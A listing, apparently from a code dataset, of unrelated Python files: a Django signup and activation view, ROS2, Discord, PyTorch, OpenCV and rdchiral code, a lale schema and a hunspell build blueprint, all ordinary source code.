log.info(f'username {username} already exists')
return render(request, 'registration/login.html',
context={'error_signup': 'User already exists',
'next': next_url})
elif not check_regex(username_pattern, username):
log.info(f'wrong username: {username}')
return render(request, 'registration/login.html',
context={
'error_signup': 'username can only contain alphanumeric characters along with . or _',
'next': next_url})
elif not password:
log.info('empty password')
return render(request, 'registration/login.html',
context={'error_signup': 'empty password',
'next': next_url})
elif not validate_user_email(email):
log.info(f'not valid email: {email}')
return render(request, 'registration/login.html',
context={'error_signup': f'not valid email: {email}',
'next': next_url})
elif check_existing_email(email):
log.info(f'email {email} already exists')
return render(request, 'registration/login.html',
context={'error_signup': f'email {email} already exists for an user, please try to login',
'next': next_url})
else:
user = CustomUser(username=username, email=email)
user.set_password(password)
user.api_key = secrets.token_urlsafe(15)
user.is_active = False
user.save()
log.info(f'{username} has just sign up, sending confirmation email...')
send_confirmation_email(user)
return HttpResponse(
"<h1>Congrats!</h1><p>You're just one step away to join the DataTau community.</p><p>We've just sent you a confirmation email. Please check your inbox and click on the confirmation link :)</p>")
def activation(request, user_id, api_key):
if request.method == 'GET':
user_set = CustomUser.objects.filter(id=user_id)
if len(user_set) == 1 and user_set[0].api_key == api_key:
log.info(f'activating user {user_id}...')
user = user_set[0]
user.is_active = True
user.save()
django.contrib.auth.login(request, user)
else:
log.info(f'unable to activate user {user_id}')
return redirect('index')
|
457957
|
from __future__ import division, print_function
import numpy as np
import plyades.util as util
def precession(date):
''' Vallado 2nd Edition p.215
'''
# Julian centuries since the epoch
t = (date - 2451545)/36525
zeta = util.dms2rad(0, 0, 2306.2181*t + 0.30188*t**2 + 0.017998*t**3)
theta = util.dms2rad(0, 0, 2004.3109*t - 0.42665*t**2 - 0.041833*t**3)
z = util.dms2rad(0, 0, 2306.2181*t + 1.09468*t**2 + 0.018203*t**3)
# Determine rotational matrices.
M1 = util.rot(-z, axis=3)
M2 = util.rot(theta, axis=2)
M3 = util.rot(-zeta, axis=3)
return np.dot(M1, np.dot(M2, M3))
# from scipy import optimize
#
# pvecle = aux.pvecle
# pelvec = aux.pelvec
#
#
# def eci2ecef(s, theta, omega):
# M = np.zeros((6, 6))
# M[0, 0] = np.cos(theta)
# M[0, 1] = np.sin(theta)
# M[1, 0] = -np.sin(theta)
# M[1, 1] = np.cos(theta)
# M[2, 2] = 1
# M[3, 0] = -omega * np.sin(theta)
# M[3, 1] = omega * np.cos(theta)
# M[4, 0] = -omega * np.cos(theta)
# M[4, 1] = -omega * np.sin(theta)
# M[3, 3] = M[0, 0]
# M[3, 4] = M[0, 1]
# M[4, 3] = M[1, 0]
# M[4, 4] = M[1, 1]
# M[5, 5] = M[2, 2]
#
# st = np.dot(M, s)
# return st, M
#
# def ecef2eci(s, theta, omega):
# M = np.zeros((3, 3))
# N = np.zeros((3, 3))
# st = np.zeros(6)
# M[0, 0] = np.cos(theta)
# M[0, 1] = np.sin(theta)
# M[1, 0] = -np.sin(theta)
# M[1, 1] = np.cos(theta)
# M[2, 2] = 1
# N[0, 0] = -omega * np.sin(theta)
# N[0, 1] = omega * np.cos(theta)
# N[1, 0] = -omega * np.cos(theta)
# N[1, 1] = -omega * np.sin(theta)
#
# st[0:3] = np.dot(M.T, s[0:3])
# st[3:6] = np.dot(M.T, s[3:6]) + np.dot(N.T, s[0:3])
# return st, M.T
#
#
#
# def lla2ecef(lat, lon, alt):
# e = np.sqrt(2 * earth.f - earth.f ** 2)
# c = earth.r_e / np.sqrt(1 - e ** 2 * np.sin(lat) ** 2)
# s = c * (1 - e ** 2)
# r_delta = (c + alt) * np.cos(lat)
# r_k = (s + alt) * np.sin(lat)
# return np.array([r_delta * np.cos(lon), r_delta * np.sin(lon), r_k])
#
#
# def ecef2lla(s, tol=1e-10):
# x, y, z = s[0:3]
# r = np.sqrt(x ** 2 + y ** 2 + z ** 2)
# r_delta = np.sqrt(x ** 2 + y ** 2)
# lon = np.arctan2(y, x)
#
# if abs(lon) >= np.pi:
# if lon < 0:
# lon = 2 * np.pi + lon
# else:
# lon = lon - 2 * np.pi
#
# delta = np.arcsin(z / r)
#
# def latitude(lat):
# e = np.sqrt(2 * earth.f - earth.f ** 2)
# c = earth.r_e / np.sqrt(1 - e ** 2 * np.sin(lat) ** 2)
# return (z + c * e ** 2 * np.sin(lat)) / r_delta - np.tan(lat)
#
# lat = optimize.newton(latitude, delta, tol=tol)
#
# e = np.sqrt(2 * earth.f - earth.f ** 2)
# c = earth.r_e / np.sqrt(1 - e ** 2 * np.sin(lat) ** 2)
# alt = r_delta / np.cos(lat) - c
#
# return np.array([lat, lon, alt])
#
#
# def ecef2sez(s, site=None, lat=None, lon=None, alt=None):
# if not site == None:
# ecef = site
# lat, lon, alt = ecef2lla(ecef)
# elif not lat == None or lon == None or alt == None:
# ecef = lla2ecef(lat, lon, alt)
# else:
# raise SyntaxError("""Site location must be specified in
# either ECEF format or lat/lon/alt!""")
#
# rho_ecef = s[0:3] - ecef
# rhod_ecef = s[3:6]
#
# M = np.zeros((6, 6))
# M[0, 0] = np.sin(lat) * np.cos(lon)
# M[0, 1] = np.sin(lat) * np.sin(lon)
# M[0, 2] = -np.cos(lat)
# M[1, 0] = -np.sin(lon)
# M[1, 1] = np.cos(lon)
# M[2, 0] = np.cos(lat) * np.cos(lon)
# M[2, 1] = np.cos(lat) * np.sin(lon)
# M[2, 2] = np.sin(lat)
# M[3:6, 3:6] = M[0:3, 0:3]
#
# return np.dot(M, np.append(rho_ecef, rhod_ecef)), M
#
#
# def sez2razel(s):
# ran = np.sqrt(np.dot(s[0:3], s[0:3]))
# rrt = np.dot(s[0:3], s[3:6]) / ran
# el = np.arcsin(s[2] / ran)
# az = np.arctan2(s[1], -s[0])
#
# return ran, rrt, az, el
#
|
457987
|
from ..factory import Type
class callStateReady(Type):
protocol = None # type: "callProtocol"
connections = None # type: "vector<callConnection>"
config = None # type: "string"
encryption_key = None # type: "bytes"
emojis = None # type: "vector<string>"
allow_p2p = None # type: "Bool"
|
458025
|
from __future__ import absolute_import
import time
from flexmock import flexmock
import pony.tasks
from tests.test_base import BaseTest
class SendMessageTest(BaseTest):
def test_execute(self):
task = pony.tasks.SendMessage('_to', '_text', [1, 2, 3])
(flexmock(self.bot.slack_client.server)
.should_receive('send_to_websocket')
.with_args(dict(type='typing', channel='_to')))
# send typing does imitate human typing by waiting up to 2 seconds
(flexmock(time)
.should_receive('sleep')
.times(2))
(flexmock(self.slack)
.should_receive('api_call')
.with_args(
'chat.postMessage',
channel='_to',
text='_text',
attachments=[1, 2, 3],
as_user=True
))
task.execute(self.bot, self.slack)
|
458092
|
import info
class subinfo(info.infoclass):
def setTargets( self ):
self.svnTargets[ "master"] = f"https://github.com/hunspell/hunspell.git"
for ver in ["1.6.2"]:
self.targets[ver] = f"https://github.com/hunspell/hunspell/archive/v1.6.2.tar.gz"
self.archiveNames[ver] = f"hunspell-v{ver}.tar.gz"
self.targetInstSrc[ver] = f"hunspell-{ver}"
self.targetDigests["1.6.2"] = (['3cd9ceb062fe5814f668e4f22b2fa6e3ba0b339b921739541ce180cac4d6f4c4'], CraftHash.HashAlgorithm.SHA256)
self.description = "Hunspell is the spell checker of LibreOffice, OpenOffice.org, Mozilla Firefox 3 & Thunderbird, Google Chrome, and it is also used by proprietary software packages, like macOS, InDesign, memoQ, Opera and SDL Trados."
self.webpage = "http://hunspell.github.io/"
self.defaultTarget = "1.6.2"
def setDependencies( self ):
if CraftCore.compiler.isMinGW():
self.buildDependencies["dev-utils/msys"] = None
self.runtimeDependencies["virtual/base"] = None
self.runtimeDependencies["libs/gettext"] = None
self.runtimeDependencies["libs/iconv"] = None
self.runtimeDependencies["data/hunspell-dictionaries"] = None
from Package.MSBuildPackageBase import *
class PackageMSVC(MSBuildPackageBase):
def __init__(self, **args):
MSBuildPackageBase.__init__(self)
self.subinfo.options.configure.projectFile = os.path.join(self.sourceDir(), "msvc", "Hunspell.sln")
self.buildTypes = {"Release" : "Release_dll", "RelWithDebInfo" : "Release_dll", "Debug" : "Debug_dll" }
def compile(self):
utils.copyFile(os.path.join(self.sourceDir(), "msvc", "config.h"), os.path.join(self.sourceDir(), "config.h"))
out = super().compile()
utils.deleteFile(os.path.join(self.sourceDir(), "config.h"))
return out
def install(self):
if not MSBuildPackageBase.install(self, installHeaders=False):
return False
for h in ["atypes.hxx", "hunspell.h", "hunspell.hxx", "hunvisapi.h", "w_char.hxx"]:
utils.copyFile(os.path.join(self.sourceDir(), "src", "hunspell", h), os.path.join(self.imageDir(), "include", "hunspell", h))
return True
from Package.AutoToolsPackageBase import *
class PackageGNU(AutoToolsPackageBase):
def __init__(self, **args):
AutoToolsPackageBase.__init__(self)
self.subinfo.options.configure.bootstrap = True
self.subinfo.options.configure.args += " --disable-static --enable-shared"
if CraftCore.compiler.isGCCLike():
class Package(PackageGNU):
pass
else:
class Package(PackageMSVC):
pass
|
458107
|
import pickle
import torch
import math
import time
def to_cuda(x):
use_gpu = torch.cuda.is_available()
if use_gpu:
x = x.cuda()
return x
def time_since(since):
now = time.time()
s = now - since
m = math.floor(s / 60)
s -= m * 60
return '%dm %ds' % (m, s)
def save_checkpoint(model, optimizer, filepath):
state = {
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
torch.save(state, filepath)
def load_checkpoint(model, optimizer, filepath):
# "lambda" allows to load the model on cpu in case it is saved on gpu
state = torch.load(filepath, lambda storage, loc: storage)
model.load_state_dict(state['state_dict'])
optimizer.load_state_dict(state['optimizer'])
return model, optimizer
def save_model(model, filepath):
# Update the saved model file
torch.save(model.state_dict(), filepath)
|
458114
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .fusion import AsymBiChaFuseReduce, BiLocalChaFuseReduce, BiGlobalChaFuseReduce
class ResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, stride, downsample):
super(ResidualBlock, self).__init__()
self.body = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, stride, 1, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(True),
nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),
nn.BatchNorm2d(out_channels),
)
if downsample:
self.downsample = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 1, stride, 0, bias=False),
nn.BatchNorm2d(out_channels),
)
else:
self.downsample = nn.Sequential()
def forward(self, x):
residual = x
x = self.body(x)
if self.downsample:
residual = self.downsample(residual)
out = F.relu(x+residual, True)
return out
class _FCNHead(nn.Module):
def __init__(self, in_channels, out_channels):
super(_FCNHead, self).__init__()
inter_channels = in_channels // 4
self.block = nn.Sequential(
nn.Conv2d(in_channels, inter_channels, 3, 1, 1, bias=False),
nn.BatchNorm2d(inter_channels),
nn.ReLU(True),
nn.Dropout(0.1),
nn.Conv2d(inter_channels, out_channels, 1, 1, 0)
)
def forward(self, x):
return self.block(x)
class ASKCResNetFPN(nn.Module):
def __init__(self, layer_blocks, channels, fuse_mode='AsymBi'):
super(ASKCResNetFPN, self).__init__()
stem_width = channels[0]
self.stem = nn.Sequential(
nn.BatchNorm2d(3),
nn.Conv2d(3, stem_width, 3, 2, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, stem_width, 3, 1, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, stem_width*2, 3, 1, 1, bias=False),
nn.BatchNorm2d(stem_width*2),
nn.ReLU(True),
nn.MaxPool2d(3, 2, 1)
)
self.layer1 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[0],
in_channels=channels[1], out_channels=channels[1], stride=1)
self.layer2 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[1],
in_channels=channels[1], out_channels=channels[2], stride=2)
self.layer3 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[2],
in_channels=channels[2], out_channels=channels[3], stride=2)
self.fuse23 = self._fuse_layer(channels[3], channels[2], channels[2], fuse_mode)
self.fuse12 = self._fuse_layer(channels[2], channels[1], channels[1], fuse_mode)
self.head = _FCNHead(channels[1], 1)
def forward(self, x):
_, _, hei, wid = x.shape
x = self.stem(x)
c1 = self.layer1(x)
c2 = self.layer2(c1)
out = self.layer3(c2)
out = F.interpolate(out, size=[hei//8, wid//8], mode='bilinear')
out = self.fuse23(out, c2)
out = F.interpolate(out, size=[hei//4, wid//4], mode='bilinear')
out = self.fuse12(out, c1)
pred = self.head(out)
out = F.interpolate(pred, size=[hei, wid], mode='bilinear')
return out
def _make_layer(self, block, block_num, in_channels, out_channels, stride):
downsample = (in_channels != out_channels) or (stride != 1)
layer = []
layer.append(block(in_channels, out_channels, stride, downsample))
for _ in range(block_num-1):
layer.append(block(out_channels, out_channels, 1, False))
return nn.Sequential(*layer)
def _fuse_layer(self, in_high_channels, in_low_channels, out_channels, fuse_mode='AsymBi'):
assert fuse_mode in ['BiLocal', 'AsymBi', 'BiGlobal']
if fuse_mode == 'BiLocal':
fuse_layer = BiLocalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'AsymBi':
fuse_layer = AsymBiChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'BiGlobal':
fuse_layer = BiGlobalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
else:
NameError
return fuse_layer
class ASKCResUNet(nn.Module):
def __init__(self, layer_blocks, channels, fuse_mode='AsymBi'):
super(ASKCResUNet, self).__init__()
stem_width = int(channels[0])
self.stem = nn.Sequential(
nn.BatchNorm2d(3),
nn.Conv2d(3, stem_width, 3, 2, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, stem_width, 3, 1, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, 2*stem_width, 3, 1, 1, bias=False),
nn.BatchNorm2d(2*stem_width),
nn.ReLU(True),
nn.MaxPool2d(3, 2, 1),
)
self.layer1 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[0],
in_channels=channels[1], out_channels=channels[1], stride=1)
self.layer2 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[1],
in_channels=channels[1], out_channels=channels[2], stride=2)
self.layer3 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[2],
in_channels=channels[2], out_channels=channels[3], stride=2)
self.deconv2 = nn.ConvTranspose2d(channels[3], channels[2], 4, 2, 1)
self.fuse2 = self._fuse_layer(channels[2], channels[2], channels[2], fuse_mode)
self.uplayer2 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[1],
in_channels=channels[2], out_channels=channels[2], stride=1)
self.deconv1 = nn.ConvTranspose2d(channels[2], channels[1], 4, 2, 1)
self.fuse1 = self._fuse_layer(channels[1], channels[1], channels[1], fuse_mode)
self.uplayer1 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[0],
in_channels=channels[1], out_channels=channels[1], stride=1)
self.head = _FCNHead(channels[1], 1)
def forward(self, x):
_, _, hei, wid = x.shape
x = self.stem(x)
c1 = self.layer1(x)
c2 = self.layer2(c1)
c3 = self.layer3(c2)
deconc2 = self.deconv2(c3)
fusec2 = self.fuse2(deconc2, c2)
upc2 = self.uplayer2(fusec2)
deconc1 = self.deconv1(upc2)
fusec1 = self.fuse1(deconc1, c1)
upc1 = self.uplayer1(fusec1)
pred = self.head(upc1)
out = F.interpolate(pred, size=[hei, wid], mode='bilinear')
return out
def _make_layer(self, block, block_num, in_channels, out_channels, stride):
layer = []
downsample = (in_channels != out_channels) or (stride != 1)
layer.append(block(in_channels, out_channels, stride, downsample))
for _ in range(block_num-1):
layer.append(block(out_channels, out_channels, 1, False))
return nn.Sequential(*layer)
def _fuse_layer(self, in_high_channels, in_low_channels, out_channels, fuse_mode='AsymBi'):
assert fuse_mode in ['BiLocal', 'AsymBi', 'BiGlobal']
if fuse_mode == 'BiLocal':
fuse_layer = BiLocalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'AsymBi':
fuse_layer = AsymBiChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'BiGlobal':
fuse_layer = BiGlobalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
else:
NameError
return fuse_layer
|
458233
|
import discord
from discord.ext import commands
class Help(commands.Cog):
"""Displays the message you are currently viewing!"""
def __init__(self,bot):
self.bot = bot
@commands.command()
@commands.has_permissions(add_reactions=True,embed_links=True)
async def help(self,ctx,*cog):
"""Gets all cogs and commands of mine."""
if not cog:
helpEmbed=discord.Embed(title='Available Cogs',
description=f'Use `{ctx.prefix}help *cog*` to find out more about them!', color=self.bot.config.color)
cogs_desc = ''
for x in self.bot.cogs:
cogs_desc += f'**{x}** - {self.bot.cogs[x].__doc__}\n'
helpEmbed.add_field(name='\u200b', value=cogs_desc[0:len(cogs_desc)-1] if cogs_desc[0:len(cogs_desc)-1] else '\u200b',inline=False)
await ctx.message.add_reaction(emoji='✉')
await ctx.author.send(embed=helpEmbed)
else:
if len(cog) > 1:
helpEmbed = discord.Embed(title='Error!',description='That is way too many cogs!',color=discord.Color.red())
await ctx.author.send(embed=helpEmbed)
else:
found = False
for x in self.bot.cogs:
for y in cog:
if x == y:
helpEmbed=discord.Embed(title=f'{cog[0]} Commands',description=self.bot.cogs[cog[0]].__doc__, color=self.bot.config.color)
for c in self.bot.get_cog(y).get_commands():
if not c.hidden:
helpEmbed.add_field(name=c.name,value=c.help,inline=False)
found = True
if not found:
helpEmbed = discord.Embed(title='Error!',description=f'Cog "{cog[0]}" does not exist! Maybe check your spelling?',color=discord.Color.red())
else:
await ctx.message.add_reaction(emoji='✉')
await ctx.author.send(embed=helpEmbed)
def setup(bot):
bot.add_cog(Help(bot))
|
458251
|
import rclpy
from rclpy.node import Node
from rclpy.exceptions import ParameterNotDeclaredException
from rcl_interfaces.msg import ParameterType
class MyPythonNode(Node):
def __init__(self):
super().__init__("dummy_node")
self.get_logger().info("This node just says 'Hello'")
timer_period = 2 # seconds
self.timer = self.create_timer(timer_period, self.timer_callback)
self.declare_parameters(
namespace='',
parameters=[
('my_int', None),
('my_string', None)
])
# self.declare_parameter('my_string', None)
def printParams(self):
self.get_logger().info("My parameters: " +
self.get_parameter('my_string').get_parameter_value().string_value + ", " + str(self.get_parameter('my_int').get_parameter_value().integer_value))
def timer_callback(self):
my_param_s = self.get_parameter(
'my_string').get_parameter_value().string_value
self.get_logger().info('Hello %s!' % my_param_s)
def main(args=None):
rclpy.init(args=args)
node = MyPythonNode()
node.printParams()
rclpy.spin(node)
node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
458284
|
from numpy import inf, nan
from sklearn.gaussian_process import GaussianProcessClassifier as Op
from lale.docstrings import set_docstrings
from lale.operators import make_operator
class _GaussianProcessClassifierImpl:
def __init__(self, **hyperparams):
self._hyperparams = hyperparams
self._wrapped_model = Op(**self._hyperparams)
def fit(self, X, y=None):
if y is not None:
self._wrapped_model.fit(X, y)
else:
self._wrapped_model.fit(X)
return self
def predict(self, X):
return self._wrapped_model.predict(X)
def predict_proba(self, X):
return self._wrapped_model.predict_proba(X)
_hyperparams_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "inherited docstring for GaussianProcessClassifier Gaussian process classification (GPC) based on Laplace approximation.",
"allOf": [
{
"type": "object",
"required": [
"kernel",
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"warm_start",
"copy_X_train",
"random_state",
"multi_class",
"n_jobs",
],
"relevantToOptimizer": [
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"multi_class",
],
"additionalProperties": False,
"properties": {
"kernel": {
"XXX TODO XXX": "kernel object",
"description": "The kernel specifying the covariance function of the GP",
"enum": [None],
"default": None,
},
"optimizer": {
"anyOf": [
{"laleType": "callable", "forOptimizer": False},
{"enum": ["fmin_l_bfgs_b"]},
],
"default": "fmin_l_bfgs_b",
"description": "Can either be one of the internally supported optimizers for optimizing the kernel's parameters, specified by a string, or an externally defined optimizer passed as a callable",
},
"n_restarts_optimizer": {
"type": "integer",
"minimumForOptimizer": 0,
"maximumForOptimizer": 1,
"distribution": "uniform",
"default": 0,
"description": "The number of restarts of the optimizer for finding the kernel's parameters which maximize the log-marginal likelihood",
},
"max_iter_predict": {
"type": "integer",
"minimumForOptimizer": 100,
"maximumForOptimizer": 101,
"distribution": "uniform",
"default": 100,
"description": "The maximum number of iterations in Newton's method for approximating the posterior during predict",
},
"warm_start": {
"type": "boolean",
"default": False,
"description": "If warm-starts are enabled, the solution of the last Newton iteration on the Laplace approximation of the posterior mode is used as initialization for the next call of _posterior_mode()",
},
"copy_X_train": {
"type": "boolean",
"default": True,
"description": "If True, a persistent copy of the training data is stored in the object",
},
"random_state": {
"anyOf": [
{"type": "integer"},
{"laleType": "numpy.random.RandomState"},
{"enum": [None]},
],
"default": None,
"description": "The generator used to initialize the centers",
},
"multi_class": {
"XXX TODO XXX": "string, default",
"description": "Specifies how multi-class classification problems are handled",
"enum": ["one_vs_one", "one_vs_rest"],
"default": "one_vs_rest",
},
"n_jobs": {
"anyOf": [{"type": "integer"}, {"enum": [None]}],
"default": 1,
"description": "The number of jobs to use for the computation",
},
},
}
],
}
_input_fit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Fit Gaussian process classification model",
"type": "object",
"required": ["X", "y"],
"properties": {
"X": {
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
"description": "Training data",
},
"y": {
"type": "array",
"items": {"type": "number"},
"description": "Target values, must be binary",
},
},
}
_input_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Perform classification on an array of test vectors X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Predicted target values for X, values are from ``classes_``",
"type": "array",
"items": {"type": "number"},
}
_input_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Return probability estimates for the test vector X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Returns the probability of the samples for each class in the model",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
_combined_schemas = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Combined schema for expected data and hyperparameters.",
"documentation_url": "https://scikit-learn.org/0.20/modules/generated/sklearn.gaussian_process.GaussianProcessClassifier#sklearn-gaussian_process-gaussianprocessclassifier",
"import_from": "sklearn.gaussian_process",
"type": "object",
"tags": {"pre": [], "op": ["estimator", "classifier"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
"input_predict_proba": _input_predict_proba_schema,
"output_predict_proba": _output_predict_proba_schema,
},
}
GaussianProcessClassifier = make_operator(
_GaussianProcessClassifierImpl, _combined_schemas
)
set_docstrings(GaussianProcessClassifier)
|
458286
|
import cv2
import numpy as np
def draw_rectangle(event, x, y, flags, params):
global x_init, y_init, drawing
def update_pts():
params["top_left_pt"] = (min(x_init, x), min(y_init, y))
params["bottom_right_pt"] = (max(x_init, x), max(y_init, y))
img[y_init:y, x_init:x] = 255 - img[y_init:y, x_init:x]
if event == cv2.EVENT_LBUTTONDOWN:
drawing = True
x_init, y_init = x, y
elif event == cv2.EVENT_MOUSEMOVE and drawing:
update_pts()
elif event == cv2.EVENT_LBUTTONUP:
drawing = False
update_pts()
if __name__=='__main__':
drawing = False
event_params = {"top_left_pt": (-1, -1), "bottom_right_pt": (-1, -1)}
cap = cv2.VideoCapture(0)
# Check if the webcam is opened correctly
if not cap.isOpened():
raise IOError("Cannot open webcam")
cv2.namedWindow('Webcam')
cv2.setMouseCallback('Webcam', draw_rectangle, event_params)
while True:
ret, frame = cap.read()
img = cv2.resize(frame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)
(x0,y0), (x1,y1) = event_params["top_left_pt"], event_params["bottom_right_pt"]
img[y0:y1, x0:x1] = 255 - img[y0:y1, x0:x1]
cv2.imshow('Webcam', img)
c = cv2.waitKey(1)
if c == 27:
break
cap.release()
cv2.destroyAllWindows()
|
458298
|
import rdkit.Chem as Chem
import rdkit.Chem.AllChem as AllChem
from rdkit.Chem.rdchem import ChiralType, BondType, BondDir
from rdchiral.chiral import template_atom_could_have_been_tetra
from rdchiral.utils import vprint
class rdchiralReaction():
'''
Class to store everything that should be pre-computed for a reaction. This
makes library application much faster, since we can pre-do a lot of work
instead of doing it for every mol-template pair
'''
def __init__(self, reaction_smarts):
# Keep smarts, useful for reporting
self.reaction_smarts = reaction_smarts
# Initialize - assigns stereochemistry and fills in missing rct map numbers
self.rxn = initialize_rxn_from_smarts(reaction_smarts)
# Combine template fragments so we can play around with isotopes
self.template_r, self.template_p = get_template_frags_from_rxn(self.rxn)
# Define molAtomMapNumber->atom dictionary for template rct and prd
self.atoms_rt_map = {a.GetIntProp('molAtomMapNumber'): a \
for a in self.template_r.GetAtoms() if a.HasProp('molAtomMapNumber')}
self.atoms_pt_map = {a.GetIntProp('molAtomMapNumber'): a \
for a in self.template_p.GetAtoms() if a.HasProp('molAtomMapNumber')}
# Call template_atom_could_have_been_tetra to pre-assign value to atom
[template_atom_could_have_been_tetra(a) for a in self.template_r.GetAtoms()]
[template_atom_could_have_been_tetra(a) for a in self.template_p.GetAtoms()]
class rdchiralReactants():
'''
Class to store everything that should be pre-computed for a reactant mol
so that library application is faster
'''
def __init__(self, reactant_smiles):
# Keep original smiles, useful for reporting
self.reactant_smiles = reactant_smiles
# Initialize into RDKit mol
self.reactants = initialize_reactants_from_smiles(reactant_smiles)
# Set isotope->atom dictionary
# all reactant atoms must be mapped after initialization, so this is safe
self.atoms_r = {a.GetIsotope(): a for a in self.reactants.GetAtoms()}
# Create copy of molecule without chiral information, used with
# RDKit's naive runReactants
self.reactants_achiral = initialize_reactants_from_smiles(reactant_smiles)
[a.SetChiralTag(ChiralType.CHI_UNSPECIFIED) for a in self.reactants_achiral.GetAtoms()]
# TODO: strip bond chirality?
# Pre-list reactant bonds (for stitching broken products)
self.bonds_by_isotope = [
(b.GetBeginAtom().GetIsotope(), b.GetEndAtom().GetIsotope(), b) \
for b in self.reactants.GetBonds()
]
def initialize_rxn_from_smarts(reaction_smarts):
# Initialize reaction
rxn = AllChem.ReactionFromSmarts(reaction_smarts)
rxn.Initialize()
if rxn.Validate()[1] != 0:
raise ValueError('validation failed')
vprint(2, 'Validated rxn without errors')
unmapped = 700
for rct in rxn.GetReactants():
rct.UpdatePropertyCache()
Chem.AssignStereochemistry(rct)
# Fill in atom map numbers
for a in rct.GetAtoms():
if not a.HasProp('molAtomMapNumber'):
a.SetIntProp('molAtomMapNumber', unmapped)
unmapped += 1
vprint(2, 'Added {} map nums to unmapped reactants', unmapped-700)
if unmapped > 800:
raise ValueError('Why do you have so many unmapped atoms in the template reactants?')
return rxn
def initialize_reactants_from_smiles(reactant_smiles):
# Initialize reactants
reactants = Chem.MolFromSmiles(reactant_smiles)
Chem.AssignStereochemistry(reactants, flagPossibleStereoCenters=True)
reactants.UpdatePropertyCache()
# To have the product atoms match reactant atoms, we
# need to populate the Isotope field, since this field
# gets copied over during the reaction.
[a.SetIsotope(i+1) for (i, a) in enumerate(reactants.GetAtoms())]
vprint(2, 'Initialized reactants, assigned isotopes, stereochem, flagpossiblestereocenters')
return reactants
def get_template_frags_from_rxn(rxn):
# Copy reaction template so we can play around with isotopes
for i, rct in enumerate(rxn.GetReactants()):
if i == 0:
template_r = rct
else:
template_r = AllChem.CombineMols(template_r, rct)
for i, prd in enumerate(rxn.GetProducts()):
if i == 0:
template_p = prd
else:
template_p = AllChem.CombineMols(template_p, prd)
return template_r, template_p
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.